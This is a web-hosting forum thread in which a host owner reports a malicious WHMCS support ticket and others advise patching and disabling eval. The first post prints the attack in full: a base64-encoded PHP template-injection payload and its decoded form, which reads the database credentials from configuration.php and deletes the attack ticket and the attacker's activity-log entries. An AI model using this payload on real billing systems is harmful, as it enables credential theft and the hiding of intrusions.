Activity Stream
48,167 MEMBERS
61706 ONLINE
besthostingforums On YouTube Subscribe to our Newsletter besthostingforums On Twitter besthostingforums On Facebook besthostingforums On facebook groups

Results 1 to 7 of 7
  1.     
    #1
    Banned

    Default Hackers Attacked Mxzon's Server

    Hi everyone,

    I dnt know if its related to recent hack or what,

    In Mxzon's billing system, we got a a ticket with subject:

    Code: 
    {php}eval(base64_decode('JHRleHQ9ZmlsZV9nZXRfY29udGVudHMoImNvbmZpZ3VyYXRpb24ucGhwIik7DQoNCg0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KDQpldmFsKCR0ZXh0KTsNCg0KJGRiPW15c3FsX2Nvbm5lY3QoJGRiX2hvc3QsJGRiX3VzZXJuYW1lLCRkYl9wYXNzd29yZCkgb3IgZGllKCJDYW4ndCBvcGVuIGNvbm5lY3Rpb24gdG8gTXlTUUwiKTsNCm15c3FsX3NlbGVjdF9kYigkZGJfbmFtZSkgb3IgZGllKCJDYW4ndCBzZWxlY3QgZGF0YKWWHhc2UiKTsNCiRkZWxldGUgPSJERUxFVEUgZnJvbSB0Ymx0aWNrZXRzIFdIRVJFIHRpdGxlIGxpa2UgMHgyNTdCNzA2ODcwN0QyNTsiOw0KbXlzcWxfcXVlcnkoJGRlbGV0ZSk7DQokZGVsZXRlMiA9IkRFTEVURSBmcm9tIHRibGFjdGl2aXR5bG9nICBXSEVSRSBpcGFkZHI9JyIuJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uIic7IjsNCm15c3FsX3F1ZXJ5KCRkZWxldGUyKTsNCg=='));{/php}
    Decoded:
    Code: 
    $text=file_get_contents("configuration.php");
    
    
    $text= str_replace("<?php", "", $text);
    $text= str_replace("<?", "", $text);
    $text= str_replace("?>", "", $text);
    
    eval($text);
    
    $db=mysql_connect($db_host,$db_username,$db_password) or die("Can't open connection to MySQL");
    mysql_select_db($db_name) or die("Can't select database");
    $delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
    mysql_query($delete);
    $delete2 ="DELETE from tblactivitylog  WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
    mysql_query($delete2);
    I dnt know if it worked, but it didn't harmed our billing system...
    I deleted the ticket, plz be alerted as i think boxslots and servedome are also heaving issues...

    I think if we disable eval it can make this hack zero...
    what you guys suggest??

    Regards,
    Ali Arshad
    Founder / CEO
    Mxzon Hosting Solutions
    (www.mxzon.com)
    _Hosting_ Reviewed by _Hosting_ on . Hackers Attacked Mxzon's Server Hi everyone, I dnt know if its related to recent hack or what, In Mxzon's billing system, we got a a ticket with subject: Rating: 5

  2.   Sponsored Links

  3.     
    #2
    Banned
    Website's:
    xsl.tel xsltel.com
    apply this WHMCS patch if you didn't yet

    http://forum.whmcs.com/showthread.php?t=43462

    Highest Regards
    Mohammed H

  4.     
    #3
    Member
    Yes, it's the lastest exploit.

    First go here and download official patch.
    http://forum.whmcs.com/showthread.ph...522#post206522

    Then you can follow my guide if you want to make your WHMcs a bit more secure.
    http://www.besthostingforums.com/10-...tch-whmcs.html

    You can also disable eval, WHMcs doesn't need it.
    KnownSRV.com - Quality comes at a price, and we provide it at affordable prices.
    PayPal, Skrill(MoneyBookers), Payza(AlertPay), 2CheckOut and LibertyReserve accepted!

  5.     
    #4
    Banned
    I already did, is it related to this patch???

    Regards,
    Ali Arshad
    Founder / CEO
    Mxzon Hosting Solutions
    (www.mxzon.com)

  6.     
    #5
    Member
    Yes, the latest patch will fix above exploit.
    KnownSRV.com - Quality comes at a price, and we provide it at affordable prices.
    PayPal, Skrill(MoneyBookers), Payza(AlertPay), 2CheckOut and LibertyReserve accepted!

  7.     
    #6
    Banned
    Website's:
    LinkDDL.com DDLShack.net IhateDowntime.co
    I got the same support ticket submitted today from a France IP Address.

    I already applied the WHMCS patch the day it was released.

  8.     
    #7
    Member
    I don't think the hack worked either, because the ticket would have been deleted if it did.


    Join Animeshed.Com A new anime forum.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. My site has been attacked by SYN Flood
    By chipve in forum Webmaster Discussion
    Replies: 3
    Last Post: 15th Oct 2012, 07:36 PM
  2. One Million Web Pages Attacked By Lilupophilupop
    By Daniel in forum News & Current Events
    Replies: 7
    Last Post: 4th Jan 2012, 07:27 PM
  3. DLE site keeps gettin attacked
    By mp3show in forum DLE
    Replies: 4
    Last Post: 27th Nov 2011, 09:37 PM
  4. Site Getting Attacked?
    By RNBxBeatz in forum Server Management
    Replies: 24
    Last Post: 15th Jun 2011, 02:48 AM
  5. Warez-BB DDoS attacked
    By patt1293 in forum News & Current Events
    Replies: 11
    Last Post: 9th Jun 2009, 05:28 PM

Tags for this Thread

BE SOCIAL